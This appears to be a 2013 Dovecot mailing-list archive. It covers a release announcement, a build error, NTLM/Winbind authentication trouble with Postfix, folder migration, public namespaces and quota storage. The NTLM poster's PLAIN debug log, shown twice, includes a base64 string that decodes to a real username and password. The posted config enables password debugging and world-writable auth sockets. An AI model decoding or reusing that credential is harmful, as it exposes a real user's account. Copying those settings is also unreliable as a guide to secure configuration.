<1372273718.13590.1.camel@innu.dovecot.net> http://dovecot.org/releases/2.1/dovecot-2.1.17.tar.gz http://dovecot.org/releases/2.1/dovecot-2.1.17.tar.gz.sig Hopefully among the last v2.1.x releases. + zlib: Keep the last read mail uncompressed in a temporary file. This significantly improves performance when IMAP client does small partial fetches for a large mail. + acl: Optionally get default ACL's for private/shared namespaces from user's INBOX (plugin { acl_defaults_from_inbox = yes } - Case-insensitive unicode character comparisons weren't all working as they should. - maildir: Fixed handling over 26 keywords in a mailbox. - auth: Don't crash in non-PLAIN/LOGIN auth mechanism if master user login is attempted without any master passdbs configured. From jacky.lau at live.com Wed Jun 26 22:09:04 2013 From: jacky.lau at live.com (LauJacky) Date: Wed, 26 Jun 2013 19:09:04 +0000 Subject: [Dovecot] =?utf-8?q?Dovecot-2=2E2=2E4_compiled_error=E2=80=8F?= In-Reply-To: References: Message-ID: [root at OLinux dovecot-2.2.4]# grep __le32 /usr/include/linux/types.h typedef __u32 __bitwise __le32; [root at CentOS5 ~]# cd /usr/include [root at CentOS5 include]# grep -r "#define _LINUX_TYPES_H" * linux/types.h:#define _LINUX_TYPES_H sys/capability.h:#define _LINUX_TYPES_H The root problem is sys/capability.h prevents linux/types.h from being included, so to solve this issue you always need to include linux/types.h, one way or another. > From: jacky.lau at live.com > To: dovecot at dovecot.org > Date: Wed, 26 Jun 2013 17:27:54 +0000 > Subject: [Dovecot] Dovecot-2.2.4 compiled error? > > > > > > > > I compiled dovecot error, google did not find a solution. and I don't understand the code, how can i do Compiled dovecot-2.2.4 in "Linux OLinux 2.6.32-200.13.1.el5uek #1 SMP Wed Jul 27 21:02:33 EDT 2011 x86_64 x86_64 x86_64 GNU/Linux "environment variables : #CPPFLAGS="-I/usr/include/openssl" LDFLAGS="-L/usr/lib/openssl" ./configure --with-ldap #make........gcc -DHAVE_CONFIG_H -I. -I../.. -I../../src/lib -I../../src/lib-settings -I../../src/lib-master -DPKG_RUNDIR=\""/usr/local/var/run/dovecot"\" -DPKG_STATEDIR=\""/usr/local/var/lib/dovecot"\" -DPKG_LIBEXECDIR=\""/usr/local/libexec/dovecot"\" -DBINDIR=\""/usr/local/bin"\" -I/usr/include/openssl -std=gnu99 -g -O2 -Wall -W -Wmissing-prototypes -Wmissing-declarations -Wpointer-arith -Wchar-subscripts -Wformat=2 -Wbad-function-cast -fno-builtin-strftime -Wstrict-aliasing=2 -I/usr/kerberos/include -MT capabilities-posix.o -MD -MP -MF .deps/capabilities-posix.Tpo -c -o capabilities-posix.o capabilities-posix.cIn file included from /usr/include/sys/capability.h:34, from capabilities-posix.c:8:/usr/include/linux/capability.h:73: error: expected specifier-qualifier-list before ???__le32???make[3]: *** [capabilities-posix.o] Error 1make[3]: Leaving directory `/home/ldf/dovecot-2.2.4/src/master'make[2]: *** [all-recursive] Error 1make[2]: Leaving directory `/home/ldf/dovecot-2.2.4/src'make[1]: *** [all-recursive] Error 1make[1]: Leaving directory `/home/ldf/dovecot-2.2.4'make: *** [all] Error 2 Best regardjacky > > From stan at hardwarefreak.com Thu Jun 27 00:26:19 2013 From: stan at hardwarefreak.com (Stan Hoeppner) Date: Wed, 26 Jun 2013 16:26:19 -0500 Subject: [Dovecot] Passdb + single sing on + NTLM + Thunderbird. In-Reply-To: References: Message-ID: <51CB5C7B.90606@hardwarefreak.com> On 6/26/2013 1:17 PM, Maria Jose Ya?ez Dacosta wrote: > I want to use single sign on from Windows with Thunderbird or Outlook using > NTLM. http://wiki2.dovecot.org/Authentication/Kerberos -- Stan From utegrad at gmail.com Thu Jun 27 03:27:10 2013 From: utegrad at gmail.com (Matthew Larsen) Date: Wed, 26 Jun 2013 17:27:10 -0700 Subject: [Dovecot] NTLM authentication mechanism with Postfix Message-ID: I'm working on getting authentication for Postfix smtpd clients working with Dovecot. I've got both plain text and GSSAPI mechanisms working. Winbind also works for shell access and the command line test work fine. If I can get NTLM authentication working I can use Postfix as a drop in replacement for a MS MTA I want get rid of. I'm hoping the community might be able to offer some insight into what I'm missing to get NTLM authentication working with Dovecot and Postfix. Something related to winbind I suspect. When I use the NTLM mechanism I get this in my maillog file. Nothing seems to show up in the winbind files for this. ---- log file from NTLM mechanism used ---- Jun 26 17:02:53 SBSMTPNV05 postfix/smtpd[2221]: connect from nvit01b.mydomain.com[10.20.2.0] Jun 26 17:02:53 SBSMTPNV05 dovecot: auth: Debug: client in: AUTH#0112#011NTLM#011service=smtp#011nologin#011lip=10.20.4.12#011rip=10.20.2.0#011resp=TlRM...A= Jun 26 17:02:53 SBSMTPNV05 dovecot: auth: Debug: client out: CONT#0112#011TlRM....A Jun 26 17:02:53 SBSMTPNV05 dovecot: auth: Debug: client in: CONT#0112#011TlRM....Q= Jun 26 17:02:53 SBSMTPNV05 dovecot: auth: winbind(?,10.20.2.0): user not authenticated: NT_STATUS_UNSUCCESSFUL Jun 26 17:02:55 SBSMTPNV05 postfix/smtpd[2221]: warning: nvit01b.mydomain.com[10.20.2.0]: SASL NTLM authentication failed: TlRM....A Jun 26 17:02:55 SBSMTPNV05 dovecot: auth: Debug: client out: FAIL#0112 Jun 26 17:02:59 SBSMTPNV05 postfix/smtpd[2221]: disconnect from nvit01b.mydomain.com[10.20.2.0] ------------------------------------------ ---- log file from GSSAPI mechanism used ----- Jun 26 17:02:08 SBSMTPNV05 postfix/smtpd[2221]: connect from nvit01b.mydomain.com[10.20.2.0] Jun 26 17:02:08 SBSMTPNV05 dovecot: auth: Debug: auth client connected (pid=2221) Jun 26 17:02:08 SBSMTPNV05 dovecot: auth: Debug: client in: AUTH#0111#011GSSAPI#011service=smtp#011nologin#011lip=10.20.4.12#011rip=10.20.2.0#011resp=YIIN.... Jun 26 17:02:08 SBSMTPNV05 dovecot: auth: Debug: ....g== Jun 26 17:02:08 SBSMTPNV05 dovecot: auth: Debug: gssapi(?,10.20.2.0): Obtaining credentials for smtp@ Jun 26 17:02:08 SBSMTPNV05 dovecot: auth: Debug: gssapi(myusername at MYDOMAIN.COM,10.20.2.0): security context state completed. Jun 26 17:02:08 SBSMTPNV05 dovecot: auth: Debug: client out: CONT#0111#011YIGVB....E= Jun 26 17:02:08 SBSMTPNV05 dovecot: auth: Debug: client in: CONT#0111#011 Jun 26 17:02:08 SBSMTPNV05 dovecot: auth: Debug: gssapi(myusername at MYDOMAIN.COM,10.20.2.0): Negotiated security layer Jun 26 17:02:08 SBSMTPNV05 dovecot: auth: Debug: client out: CONT#0111#011BQQF/w....M= Jun 26 17:02:08 SBSMTPNV05 dovecot: auth: Debug: client in: CONT#0111#011BQQE/w....u Jun 26 17:02:08 SBSMTPNV05 dovecot: auth: Debug: client out: OK#0111#011user=myusername Jun 26 17:02:08 SBSMTPNV05 postfix/smtpd[2221]: AE80A80592: client=nvit01b.mydomain.com[10.20.2.0], sasl_method=GSSAPI, sasl_username=myusername Jun 26 17:02:08 SBSMTPNV05 postfix/cleanup[2219]: AE80A80592: message-id=<51CB8100.1010103 at example.com> Jun 26 17:02:08 SBSMTPNV05 postfix/qmgr[1999]: AE80A80592: from=, size=2178, nrcpt=1 (queue active) Jun 26 17:02:08 SBSMTPNV05 postfix/smtpd[2221]: disconnect from nvit01b.mydomain.com[10.20.2.0] Jun 26 17:02:09 SBSMTPNV05 postfix/smtp[2220]: AE80A80592: to=, relay=gmail-smtp-in.l.google.com[74.125.129.27]:25, delay=0.93, delays=0.09/0/0.15/0.69, dsn=2.0.0, status=sent (250 2.0.0 OK 1372291329 y9si419401pay.83 - gsmtp) Jun 26 17:02:09 SBSMTPNV05 postfix/qmgr[1999]: AE80A80592: removed ---------------------------------------------- ---- log file from plain text mechanism ----- Jun 26 17:01:08 SBSMTPNV05 postfix/smtpd[2209]: connect from nvit01b.mydomain.com[10.20.2.0] Jun 26 17:01:08 SBSMTPNV05 dovecot: auth: Debug: Loading modules from directory: /usr/lib64/dovecot/auth Jun 26 17:01:08 SBSMTPNV05 dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libauthdb_ldap.so Jun 26 17:01:08 SBSMTPNV05 dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libdriver_sqlite.so Jun 26 17:01:08 SBSMTPNV05 dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libmech_gssapi.so Jun 26 17:01:08 SBSMTPNV05 dovecot: auth: Debug: auth client connected (pid=2209) Jun 26 17:01:08 SBSMTPNV05 dovecot: auth: Debug: client in: AUTH#0111#011PLAIN#011service=smtp#011nologin#011lip=10.20.4.12#011rip=10.20.2.0#011secured#011resp=AG1sYXJzZW4ASWRvbnR3YW50Mg== Jun 26 17:01:08 SBSMTPNV05 dovecot: auth: Debug: Loading modules from directory: /usr/lib64/dovecot/auth Jun 26 17:01:08 SBSMTPNV05 dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libauthdb_ldap.so Jun 26 17:01:08 SBSMTPNV05 dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libdriver_sqlite.so Jun 26 17:01:08 SBSMTPNV05 dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libmech_gssapi.so Jun 26 17:01:08 SBSMTPNV05 dovecot: auth: Debug: pam(myusername,10.20.2.0): lookup service=dovecot Jun 26 17:01:08 SBSMTPNV05 dovecot: auth: Debug: pam(myusername,10.20.2.0): #1/1 style=1 msg=Password: Jun 26 17:01:09 SBSMTPNV05 dovecot: auth: Debug: client out: OK#0111#011user=myusername Jun 26 17:01:09 SBSMTPNV05 postfix/smtpd[2209]: 82C3780592: client=nvit01b.mydomain.com[10.20.2.0], sasl_method=PLAIN, sasl_username=myusername Jun 26 17:01:09 SBSMTPNV05 postfix/cleanup[2219]: 82C3780592: message-id=<51CB80C4.6020107 at example.com> Jun 26 17:01:09 SBSMTPNV05 postfix/qmgr[1999]: 82C3780592: from=, size=2728, nrcpt=1 (queue active) Jun 26 17:01:09 SBSMTPNV05 postfix/smtpd[2209]: disconnect from nvit01b.mydomain.com[10.20.2.0] Jun 26 17:01:10 SBSMTPNV05 postfix/smtp[2220]: 82C3780592: to=, relay=gmail-smtp-in.l.google.com[74.125.129.27]:25, delay=1.3, delays=0.05/0.04/0.46/0.74, dsn=2.0.0, status=sent (250 2.0.0 OK 1372291270 sb1si125565pbb.232 - gsmtp) Jun 26 17:01:10 SBSMTPNV05 postfix/qmgr[1999]: 82C3780592: removed --------------------------------------------- Here's some of the supporting configuration information: ---- postconf -n ----------- alias_database = hash:/etc/aliases alias_maps = hash:/etc/aliases command_directory = /usr/sbin config_directory = /etc/postfix daemon_directory = /usr/libexec/postfix data_directory = /var/lib/postfix debug_peer_level = 1 debug_peer_list = html_directory = no inet_interfaces = all inet_protocols = ipv4 line_length_limit = 6144 mail_owner = postfix mailq_path = /usr/bin/mailq.postfix manpage_directory = /usr/share/man mydestination = $myhostname, localhost.$mydomain, localhost myhostname = srvsbsmtp05.mydomain.com newaliases_path = /usr/bin/newaliases.postfix queue_directory = /var/spool/postfix readme_directory = /usr/share/doc/postfix-2.6.6/README_FILES sample_directory = /usr/share/doc/postfix-2.6.6/samples sendmail_path = /usr/sbin/sendmail.postfix setgid_group = postdrop smtpd_recipient_restrictions = permit_sasl_authenticated,reject_unauth_destination smtpd_sasl_auth_enable = yes smtpd_sasl_path = private/auth smtpd_sasl_security_options = noanonymous,noplaintext smtpd_sasl_type = dovecot unknown_local_recipient_reject_code = 550 ---------------------------------- ---- doveconf -n ---- # 2.0.9: /etc/dovecot/dovecot.conf # OS: Linux 2.6.32-358.11.1.el6.x86_64 x86_64 CentOS release 6.4 (Final) auth_debug_passwords = yes auth_mechanisms = plain gssapi ntlm login auth_use_winbind = yes listen = * mbox_write_locks = fcntl passdb { driver = pam } service auth { unix_listener /var/spool/postfix/private/auth { group = postfix mode = 0666 user = postfix } } ssl_cert = Message-ID: <3995313.2035.1372306451028.JavaMail.root@timgws.com.au> ----- Original Message ----- > I would like to know if is possible to use ElasticSearch instead of > Solr for FTS. I have started work on an ElasticSearch implementation based on fts-solr. There is still around 20-30 hours more work for me to do until it is complete (and I need to hunt down the reason for a random crash that happens every now and then) but I would be more then happy to share the code with you when I am done if you are interested? Regards, Tim From manoj7091 at gmail.com Thu Jun 27 07:49:14 2013 From: manoj7091 at gmail.com (Manoj Singh) Date: Thu, 27 Jun 2013 10:19:14 +0530 Subject: [Dovecot] Changing location of vmail folder, mail started downloading again Message-ID: Dear Team, Due to some reasons I need to move vmail folder to another drive. I tried to do rsync & I was able to copy all the files and structure with same old date and time stamp. I made symbolic link and new mail flow was fine but problem is, all the mail boxes started downloading old mails again . Is there any way where I can copy location of the folder without this problem. Please find the below details. Dovecot Version =============== dovecot-pigeonhole-0.2.6-21.el6.x86_64 dovecot-2.0.18-1_134.el6.x86_64 dovecot-managesieve-0.2.6-21.el6.x86_64 # dovecot ?n # 2.0.18: /etc/dovecot/dovecot.conf # OS: Linux 2.6.32-279.el6.x86_64 x86_64 CentOS release 6.3 (Final) auth_mechanisms = PLAIN LOGIN dict { acl = mysql:/etc/dovecot/dovecot-share-folder.conf expire = db:/var/lib/dovecot/expire/expire.db quotadict = mysql:/etc/dovecot/dovecot-used-quota.conf } last_valid_uid = 500 listen = * log_path = /var/log/dovecot.log mail_gid = 500 mail_location = maildir:/%Lh/Maildir/:INDEX=/%Lh/Maildir/ mail_uid = 500 managesieve_notify_capability = mailto managesieve_sieve_capability = fileinto reject envelope encoded-character vacation subaddress comparator-i;ascii-numeric relational regex imap4flags copy include variables body enotify environment mailbox date ihave namespace { inbox = yes location = prefix = separator = / type = private } namespace { list = children location = maildir:/%%Lh/Maildir/:INDEX=/%%Lh/Maildir/Shared/%%u prefix = Shared/%%u/ separator = / subscriptions = yes type = shared } passdb { args = /etc/dovecot/dovecot-ldap.conf driver = ldap } plugin { acl = vfile acl_shared_dict = proxy::acl auth_socket_path = /var/run/dovecot/auth-master autocreate = INBOX autocreate2 = Sent autocreate3 = Trash autocreate4 = Drafts autocreate5 = Junk autosubscribe = INBOX autosubscribe2 = Sent autosubscribe3 = Trash autosubscribe4 = Drafts autosubscribe5 = Junk expire = Trash 7 Trash/* 7 Junk 30 expire_dict = proxy::expire quota = dict:user::proxy::quotadict quota_rule = *:storage=1G quota_warning = storage=85%% quota-warning 85 %u quota_warning2 = storage=90%% quota-warning 90 %u quota_warning3 = storage=95%% quota-warning 95 %u sieve = /%Lh/sieve/dovecot.sieve sieve_dir = /%Lh/sieve sieve_global_dir = /var/vmail/sieve sieve_global_path = /var/vmail/sieve/dovecot.sieve } protocols = pop3 imap sieve service auth { unix_listener /var/spool/postfix/dovecot-auth { group = postfix mode = 0666 user = postfix } unix_listener auth-master { group = vmail mode = 0666 user = vmail } unix_listener auth-userdb { group = vmail mode = 0660 user = vmail } } service dict { unix_listener dict { group = vmail mode = 0660 user = vmail } } service quota-warning { executable = script /usr/local/bin/dovecot-quota-warning.sh unix_listener quota-warning { group = vmail mode = 0660 user = vmail } } ssl = required ssl_cert = Hi list, I like to have public mailboxes in addition to other private in the same domain, and manage the public mailbox permissions through acls. For example: info at domain.com <- public, readable by user2 user1 at domain.com <- private user2 at domain.com <- private The mailboxes are virtual, authentication through pam (kerberos). The public mailbox doesn't have valid kerberos account. My smtp server is exim 4.80. I set the mail delivery to lmtp. I couldn't find solution in the documentation, how can I manage the email delivery to the public namespace? There is a -m option in the lda delivery where you can give namespace prefix. Maybe it's good for this, but I couldn't find any information how can I do this with lmtp? my dovecot config: test:~# dovecot -n # 2.1.7: /etc/dovecot/dovecot.conf # OS: Linux 3.0.0-1-686-pae i686 Debian squeeze/sid managesieve_notify_capability = mailto managesieve_sieve_capability = fileinto reject envelope encoded-character vacation subaddress comparator-i;ascii-numeric relational regex imap4flags copy include variables body enotify environment mailbox date ihave namespace { location = sdbox:/home/vmail/public/%u prefix = public. separator = . subscriptions = no type = public } namespace inbox { inbox = yes location = sdbox:/home/vmail/private/%n mailbox Drafts { auto = subscribe special_use = \Drafts } mailbox Junk { special_use = \Junk } mailbox Sent { auto = subscribe special_use = \Sent } mailbox "Sent Messages" { special_use = \Sent } mailbox Spam { auto = subscribe special_use = \Junk } mailbox Trash { auto = subscribe special_use = \Trash } prefix = separator = . } passdb { driver = pam } plugin { acl = vfile sieve = /home/vmail/%n/.dovecot.sieve sieve_dir = /home/vmail/%n sieve_global_dir = /home/vmail/sieve } protocols = " imap lmtp sieve" service managesieve-login { inet_listener sieve { port = 4190 } service_count = 1 } ssl_cert = I'm using dict quota like so: quota = dict:User quota::file:/[path]/quotas/%u [path]/quotas/ is a tmpfs. The idea is to do less work on disk. Other than forcing dovecot to rebuild quotas on a reboot, are there any downsides? Thanks, Ken -- Ken Anderson Pacific Internet - http://www.pacific.net From matthew at utegrads.com Thu Jun 27 19:50:52 2013 From: matthew at utegrads.com (Matthew Larsen) Date: Thu, 27 Jun 2013 09:50:52 -0700 Subject: [Dovecot] Dovecot NTLM Authentication Message-ID: I'm working on getting authentication for Postfix smtpd clients working with Dovecot. I've got both plain text and GSSAPI mechanisms working. Winbind also works for shell access and the command line test work fine. If I can get NTLM authentication working I can use Postfix as a drop in replacement for a MS MTA I want get rid of. I'm hoping the community might be able to offer some insight into what I'm missing to get NTLM authentication working with Dovecot and Postfix. Something related to winbind I suspect. When I use the NTLM mechanism I get this " auth: Debug: client out: FAIL#0112" message in my maillog file. Nothing seems to show up in the winbind files for this. ---- log file from NTLM mechanism used ---- Jun 26 17:02:53 SBSMTPNV05 postfix/smtpd[2221]: connect from nvit01b.mydomain.com[10.20.2.0] Jun 26 17:02:53 SBSMTPNV05 dovecot: auth: Debug: client in: AUTH#0112#011NTLM#011service=smtp#011nologin#011lip=10.20.4.12#011rip=10.20.2.0#011resp=TlRM...A= Jun 26 17:02:53 SBSMTPNV05 dovecot: auth: Debug: client out: CONT#0112#011TlRM....A Jun 26 17:02:53 SBSMTPNV05 dovecot: auth: Debug: client in: CONT#0112#011TlRM....Q= Jun 26 17:02:53 SBSMTPNV05 dovecot: auth: winbind(?,10.20.2.0): user not authenticated: NT_STATUS_UNSUCCESSFUL Jun 26 17:02:55 SBSMTPNV05 postfix/smtpd[2221]: warning: nvit01b.mydomain.com[10.20.2.0]: SASL NTLM authentication failed: TlRM....A Jun 26 17:02:55 SBSMTPNV05 dovecot: auth: Debug: client out: FAIL#0112 Jun 26 17:02:59 SBSMTPNV05 postfix/smtpd[2221]: disconnect from nvit01b.mydomain.com[10.20.2.0] ------------------------------------------ ---- log file from GSSAPI mechanism used ----- Jun 26 17:02:08 SBSMTPNV05 postfix/smtpd[2221]: connect from nvit01b.mydomain.com[10.20.2.0] Jun 26 17:02:08 SBSMTPNV05 dovecot: auth: Debug: auth client connected (pid=2221) Jun 26 17:02:08 SBSMTPNV05 dovecot: auth: Debug: client in: AUTH#0111#011GSSAPI#011service=smtp#011nologin#011lip=10.20.4.12#011rip=10.20.2.0#011resp=YIIN.... Jun 26 17:02:08 SBSMTPNV05 dovecot: auth: Debug: ....g== Jun 26 17:02:08 SBSMTPNV05 dovecot: auth: Debug: gssapi(?,10.20.2.0): Obtaining credentials for smtp@ Jun 26 17:02:08 SBSMTPNV05 dovecot: auth: Debug: gssapi(myusername at MYDOMAIN.COM,10.20.2.0): security context state completed. Jun 26 17:02:08 SBSMTPNV05 dovecot: auth: Debug: client out: CONT#0111#011YIGVB....E= Jun 26 17:02:08 SBSMTPNV05 dovecot: auth: Debug: client in: CONT#0111#011 Jun 26 17:02:08 SBSMTPNV05 dovecot: auth: Debug: gssapi(myusername at MYDOMAIN.COM,10.20.2.0): Negotiated security layer Jun 26 17:02:08 SBSMTPNV05 dovecot: auth: Debug: client out: CONT#0111#011BQQF/w....M= Jun 26 17:02:08 SBSMTPNV05 dovecot: auth: Debug: client in: CONT#0111#011BQQE/w....u Jun 26 17:02:08 SBSMTPNV05 dovecot: auth: Debug: client out: OK#0111#011user=myusername Jun 26 17:02:08 SBSMTPNV05 postfix/smtpd[2221]: AE80A80592: client=nvit01b.mydomain.com[10.20.2.0], sasl_method=GSSAPI, sasl_username=myusername Jun 26 17:02:08 SBSMTPNV05 postfix/cleanup[2219]: AE80A80592: message-id=<51CB8100.1010103 at example.com> Jun 26 17:02:08 SBSMTPNV05 postfix/qmgr[1999]: AE80A80592: from=, size=2178, nrcpt=1 (queue active) Jun 26 17:02:08 SBSMTPNV05 postfix/smtpd[2221]: disconnect from nvit01b.mydomain.com[10.20.2.0] Jun 26 17:02:09 SBSMTPNV05 postfix/smtp[2220]: AE80A80592: to=, relay=gmail-smtp-in.l.google.com[74.125.129.27]:25, delay=0.93, delays=0.09/0/0.15/0.69, dsn=2.0.0, status=sent (250 2.0.0 OK 1372291329 y9si419401pay.83 - gsmtp) Jun 26 17:02:09 SBSMTPNV05 postfix/qmgr[1999]: AE80A80592: removed ---------------------------------------------- ---- log file from plain text mechanism ----- Jun 26 17:01:08 SBSMTPNV05 postfix/smtpd[2209]: connect from nvit01b.mydomain.com[10.20.2.0] Jun 26 17:01:08 SBSMTPNV05 dovecot: auth: Debug: Loading modules from directory: /usr/lib64/dovecot/auth Jun 26 17:01:08 SBSMTPNV05 dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libauthdb_ldap.so Jun 26 17:01:08 SBSMTPNV05 dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libdriver_sqlite.so Jun 26 17:01:08 SBSMTPNV05 dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libmech_gssapi.so Jun 26 17:01:08 SBSMTPNV05 dovecot: auth: Debug: auth client connected (pid=2209) Jun 26 17:01:08 SBSMTPNV05 dovecot: auth: Debug: client in: AUTH#0111#011PLAIN#011service=smtp#011nologin#011lip=10.20.4.12#011rip=10.20.2.0#011secured#011resp=AG1sYXJzZW4ASWRvbnR3YW50Mg== Jun 26 17:01:08 SBSMTPNV05 dovecot: auth: Debug: Loading modules from directory: /usr/lib64/dovecot/auth Jun 26 17:01:08 SBSMTPNV05 dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libauthdb_ldap.so Jun 26 17:01:08 SBSMTPNV05 dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libdriver_sqlite.so Jun 26 17:01:08 SBSMTPNV05 dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libmech_gssapi.so Jun 26 17:01:08 SBSMTPNV05 dovecot: auth: Debug: pam(myusername,10.20.2.0): lookup service=dovecot Jun 26 17:01:08 SBSMTPNV05 dovecot: auth: Debug: pam(myusername,10.20.2.0): #1/1 style=1 msg=Password: Jun 26 17:01:09 SBSMTPNV05 dovecot: auth: Debug: client out: OK#0111#011user=myusername Jun 26 17:01:09 SBSMTPNV05 postfix/smtpd[2209]: 82C3780592: client=nvit01b.mydomain.com[10.20.2.0], sasl_method=PLAIN, sasl_username=myusername Jun 26 17:01:09 SBSMTPNV05 postfix/cleanup[2219]: 82C3780592: message-id=<51CB80C4.6020107 at example.com> Jun 26 17:01:09 SBSMTPNV05 postfix/qmgr[1999]: 82C3780592: from=, size=2728, nrcpt=1 (queue active) Jun 26 17:01:09 SBSMTPNV05 postfix/smtpd[2209]: disconnect from nvit01b.mydomain.com[10.20.2.0] Jun 26 17:01:10 SBSMTPNV05 postfix/smtp[2220]: 82C3780592: to=, relay=gmail-smtp-in.l.google.com[74.125.129.27]:25, delay=1.3, delays=0.05/0.04/0.46/0.74, dsn=2.0.0, status=sent (250 2.0.0 OK 1372291270 sb1si125565pbb.232 - gsmtp) Jun 26 17:01:10 SBSMTPNV05 postfix/qmgr[1999]: 82C3780592: removed --------------------------------------------- Here's some of the supporting configuration information: ---- postconf -n ----------- alias_database = hash:/etc/aliases alias_maps = hash:/etc/aliases command_directory = /usr/sbin config_directory = /etc/postfix daemon_directory = /usr/libexec/postfix data_directory = /var/lib/postfix debug_peer_level = 1 debug_peer_list = html_directory = no inet_interfaces = all inet_protocols = ipv4 line_length_limit = 6144 mail_owner = postfix mailq_path = /usr/bin/mailq.postfix manpage_directory = /usr/share/man mydestination = $myhostname, localhost.$mydomain, localhost myhostname = srvsbsmtp05.mydomain.com newaliases_path = /usr/bin/newaliases.postfix queue_directory = /var/spool/postfix readme_directory = /usr/share/doc/postfix-2.6.6/README_FILES sample_directory = /usr/share/doc/postfix-2.6.6/samples sendmail_path = /usr/sbin/sendmail.postfix setgid_group = postdrop smtpd_recipient_restrictions = permit_sasl_authenticated,reject_unauth_destination smtpd_sasl_auth_enable = yes smtpd_sasl_path = private/auth smtpd_sasl_security_options = noanonymous,noplaintext smtpd_sasl_type = dovecot unknown_local_recipient_reject_code = 550 ---------------------------------- ---- doveconf -n ---- # 2.0.9: /etc/dovecot/dovecot.conf # OS: Linux 2.6.32-358.11.1.el6.x86_64 x86_64 CentOS release 6.4 (Final) auth_debug_passwords = yes auth_mechanisms = plain gssapi ntlm login auth_use_winbind = yes listen = * mbox_write_locks = fcntl passdb { driver = pam } service auth { unix_listener /var/spool/postfix/private/auth { group = postfix mode = 0666 user = postfix } } ssl_cert = References: Message-ID: <92741E65-3975-45E2-BAB5-72739B5475AD@iki.fi> On 27.6.2013, at 19.50, Matthew Larsen wrote: > Jun 26 17:02:53 SBSMTPNV05 dovecot: auth: winbind(?,10.20.2.0): user > not authenticated: NT_STATUS_UNSUCCESSFUL This is all Dovecot knows about. I can't help you further, since I know just about nothing of NTLM, Winbind or GSSAPI. Since nobody else has answered to your 5 mails to the exact same question, I doubt anyone else knows much either. Stop sending new mails asking the same thing over and over again. From tss at iki.fi Thu Jun 27 21:24:55 2013 From: tss at iki.fi (Timo Sirainen) Date: Thu, 27 Jun 2013 21:24:55 +0300 Subject: [Dovecot] Dovecot NTLM Authentication In-Reply-To: <92741E65-3975-45E2-BAB5-72739B5475AD@iki.fi> References: <92741E65-3975-45E2-BAB5-72739B5475AD@iki.fi> Message-ID: On 27.6.2013, at 20.53, Timo Sirainen wrote: > On 27.6.2013, at 19.50, Matthew Larsen wrote: > >> Jun 26 17:02:53 SBSMTPNV05 dovecot: auth: winbind(?,10.20.2.0): user >> not authenticated: NT_STATUS_UNSUCCESSFUL > > This is all Dovecot knows about. I can't help you further, since I know just about nothing of NTLM, Winbind or GSSAPI. Since nobody else has answered to your 5 mails to the exact same question, I doubt anyone else knows much either. Stop sending new mails asking the same thing over and over again. Oh, and forgot to say: Try asking in Samba lists, they should know how to debug Winbind. From thomas-lists at nybeta.com Thu Jun 27 23:42:12 2013 From: thomas-lists at nybeta.com (Thomas Harold) Date: Thu, 27 Jun 2013 16:42:12 -0400 Subject: [Dovecot] traffic statistics (collectd / rrdtool) In-Reply-To: References: Message-ID: <51CCA3A4.1070308@nybeta.com> On 9/28/2010 3:34 AM, Martin Waschb?sch wrote: > Am 26.09.2010 um 08:30 schrieb Mohit Chawla: > >> How about collectd ( http://collectd.org/ ) ? >> > Looks like a good package, but I could not find a dovecot plugin? If > you know of such an extension, that'd be awesome! > > Martin > (Since I'm setting up collectd this week, I'll resurrect this thread.) My guess is that you could re-use something similar to the one that I found for postfix tracking. It uses the 'tail' plugin of collectd and watches the /var/log/maillog file (on CentOS/RHEL). https://github.com/creckx/CollectdGraphs/blob/master/collectd_graphs/doc/collectd.postfix.conf Timo also posted two scripts last year, which I have yet to play with: > I wrote two scripts, which you can use with the stats plugin enabled to get a better "doveadm stats top" than it currently is: > > http://dovecot.org/tools/stats-top.pl > http://dovecot.org/tools/stats.pl Mostly I'm looking for a way to track the number of connections in use. From matthew at utegrads.com Thu Jun 27 23:47:30 2013 From: matthew at utegrads.com (Matthew Larsen) Date: Thu, 27 Jun 2013 13:47:30 -0700 Subject: [Dovecot] Dovecot NTLM Authentication In-Reply-To: <92741E65-3975-45E2-BAB5-72739B5475AD@iki.fi> References: <92741E65-3975-45E2-BAB5-72739B5475AD@iki.fi> Message-ID: <51CCA4E2.4060003@utegrads.com> On 6/27/2013 10:53 AM, Timo Sirainen wrote: > This is all Dovecot knows about. I can't help you further, since I know just about nothing of NTLM, Winbind or GSSAPI. Since nobody else has answered to your 5 mails to the exact same question, I doubt anyone else knows much either. Stop sending new mails asking the same thing over and over again. > My apologies. I didn't mean to be annoying. I didn't see the mailing list message from my other messages come through to my mailbox so I thought something was wrong with my subscription. I should have checked the archive first. Thank you for the response. I'll dig into the Winbind stuff some more with that documentation and community. From stan at hardwarefreak.com Fri Jun 28 02:58:49 2013 From: stan at hardwarefreak.com (Stan Hoeppner) Date: Thu, 27 Jun 2013 18:58:49 -0500 Subject: [Dovecot] Passdb + single sing on + NTLM + Thunderbird. In-Reply-To: References: <51CB5C7B.90606@hardwarefreak.com> Message-ID: <51CCD1B9.3010307@hardwarefreak.com> On 6/27/2013 7:48 AM, Maria Jose Ya?ez Dacosta wrote: > Thanks!!. > I have a little question, > This page explains AUTH = GSSAPI but I'm interested in AUTH = NTLM. > I want to get single sign on with clients in Windows against a Windows > Active Directory. > For NTLM should use another library like pam_krb5.so? > Sorry for so many questions and thanks again http://wiki2.dovecot.org/Authentication/Mechanisms/Winbind http://wiki2.dovecot.org/Authentication/Mechanisms/NTLM > 2013/6/26 Stan Hoeppner > >> On 6/26/2013 1:17 PM, Maria Jose Ya?ez Dacosta wrote: >> >>> I want to use single sign on from Windows with Thunderbird or Outlook >> using >>> NTLM. >> >> http://wiki2.dovecot.org/Authentication/Kerberos From carsten.delellis at delellis.net Fri Jun 28 08:17:39 2013 From: carsten.delellis at delellis.net (Carsten Laun-De Lellis) Date: Fri, 28 Jun 2013 07:17:39 +0200 Subject: [Dovecot] Samba4 and user auth Message-ID: <5763134862c4cb8d05cec0c518703a43@delellis.net> Hi all I am trying to set up an email Server with a Samba4 AD as user Directory. Does anybody know a good how-to to setup user auth against AD 